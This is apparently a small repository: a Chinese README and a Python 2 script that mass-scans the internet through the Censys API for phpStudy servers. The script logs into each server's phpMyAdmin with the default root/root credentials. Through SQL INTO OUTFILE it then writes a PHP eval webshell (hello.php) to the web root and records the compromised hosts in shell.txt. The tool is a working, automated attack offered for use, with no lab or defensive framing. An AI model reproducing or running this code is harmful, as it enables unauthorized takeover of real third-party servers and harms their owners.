├── README.md
└── phpStudy_Censys.py


/README.md:
--------------------------------------------------------------------------------
1 | 通过PhpStudy检测是否安装Mysql，并对安装Mysql的主机进行弱密码测试，如果能够登录则通过Mysql写入一句话木马，控制远程主机。


--------------------------------------------------------------------------------
/phpStudy_Censys.py:
--------------------------------------------------------------------------------
  1 | # coding=utf-8
  2 | import urllib2
  3 | import urllib
  4 | import re
  5 | import cookielib
  6 | import sys
  7 | from Queue import Queue
  8 | import threading
  9 | import json
 10 | import requests
 11 | import time
 12 | 
 13 | API_URL = "https://www.censys.io/api/v1"
 14 | UID = "YOUR UID"
 15 | SECRET = "YOUR SECRET"
 16 | PAGES = 50
 17 | cur_page = 1
 18 | thread_num = 20
 19 | over_num = 0
 20 | queue = Queue()
 21 | ip_OK = open("shell.txt", "w")
 22 | 
 23 | class testTarget(threading.Thread):
 24 |     def __init__(self):
 25 |         threading.Thread.__init__(self)
 26 | 
 27 |     def run(self):
 28 |         global queue
 29 |         global ip_OK
 30 |         global over_num
 31 |         global thread_num
 32 |         is_over = False
 33 |         while not is_over:
 34 |             for i in range(5):
 35 |                 if not queue.empty():
 36 |                     url = queue.get()
 37 |                 else:
 38 |                     is_over = True
 39 |                     over_num += 1
 40 |                     if over_num == thread_num:
 41 |                         ip_OK.close()
 42 |                         sys.exit()
 43 |                     break
 44 |                 if shell(url):
 45 |                     print "%s is vul" % url
 46 |                     ip_OK.write("%s/hello.php\n" % url)
 47 |                     ip_OK.flush()
 48 |                 else:
 49 |                     print "%s is not vul" % url
 50 |             time.sleep(1)
 51 | 
 52 | def shell(url):
 53 |     try:
 54 |         php_page = urllib2.urlopen(url)
 55 |         php_html=php_page.read()
 56 |         path_search = re.compile(r'<td>绝对路径</td>[\s\S]*?<td>(.*?)</td>')
 57 |         path_group = path_search.search(php_html)
 58 |         if path_group:
 59 |             path = path_group.group(1)
 60 |         else:
 61 |             return False
 62 |     except:
 63 |         return False
 64 | 
 65 |     cookies = cookielib.LWPCookieJar()
 66 |     opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookies))
 67 |     headers = {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64)'}
 68 |     params = urllib.urlencode({'pma_username': 'root', 'pma_password': 'root'})
 69 |     request = urllib2.Request(url+"/phpmyadmin/index.php", params,headers)
 70 |     try:
 71 |         response = opener.open(request)
 72 |     except:
 73 |         return False
 74 | 
 75 |     if response:
 76 |         try:
 77 |             a = response.read()
 78 |         except:
 79 |             return False
 80 |         
 81 |         pattern = re.compile(r'<p>phpMyAdmin is more friendly with a')
 82 |         judge = pattern.search(a)
 83 |         if judge != None:
 84 |             token_find = re.compile(r"token = '(.*?)';")
 85 |             token_group = token_find.search(a)
 86 |             token = token_group.group(1)
 87 | 
 88 |             if path:
 89 |                 path = path+'/hello.php'
 90 |                 sql = ["Drop TABLE IF EXISTS someone;","Create TABLE someone(cmd text NOT NULL);","Insert INTO someone (cmd) VALUES('<?php @eval($_POST[123])?>');","Select cmd from someone into outfile '"+path+"';","Drop TABLE IF EXISTS someone;"]
 91 |                 exp_headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64)'}
 92 |                 success_num = 0
 93 |                 for sql_cmd in sql:
 94 |                     exp = urllib.urlencode({'is_js_confirmed':'1', 'db':'test', 'token':token, 'sql_query':sql_cmd,'ajax_request':'true'})
 95 |                     exp_request = urllib2.Request(url+"/phpmyadmin/import.php", exp, exp_headers)
 96 |                     try:
 97 |                         exp_response = opener.open(exp_request)
 98 |                     except:
 99 |                         return False
100 | 
101 |                 try:
102 |                     res = urllib2.urlopen(url+'/hello.php')
103 |                 except urllib2.HTTPError,e:
104 |                     if e.code==404:
105 |                         return False
106 |                 else:
107 |                     return True
108 | 
109 | def getIp(page):
110 |     data = {
111 |         "query":"80.http.get.title:'phpStudy 探针 2014'",
112 |         "page":page,
113 |         "fields":["ip"]
114 |     }
115 |     try:
116 |         res = requests.post(API_URL + "/search/ipv4", data=json.dumps(data), auth=(UID, SECRET))
117 |     except:
118 |         pass
119 |     else:
120 |         try:
121 |             results = res.json()
122 |         except:
123 |             print results
124 |             pass
125 |         else:
126 |             if res.status_code != 200:
127 |                 print "error occurred: %s" % results["error"]
128 |                 sys.exit(1)
129 |             else:
130 |                 result_iter = iter(results["results"])
131 |                 for result in result_iter:
132 |                     queue.put("http://%s" % result["ip"])
133 | 
134 | def test():
135 |     for i in range(thread_num):
136 |         t = testTarget()
137 |         t.start()
138 | 
139 | if __name__ == '__main__':
140 |     getIp(cur_page)
141 |     if not queue.empty():
142 |         test()
143 |     while queue.qsize() > 0:
144 |         if cur_page <= PAGES:
145 |             getIp(cur_page)
146 |             cur_page += 1
147 |         time.sleep(0.1)


--------------------------------------------------------------------------------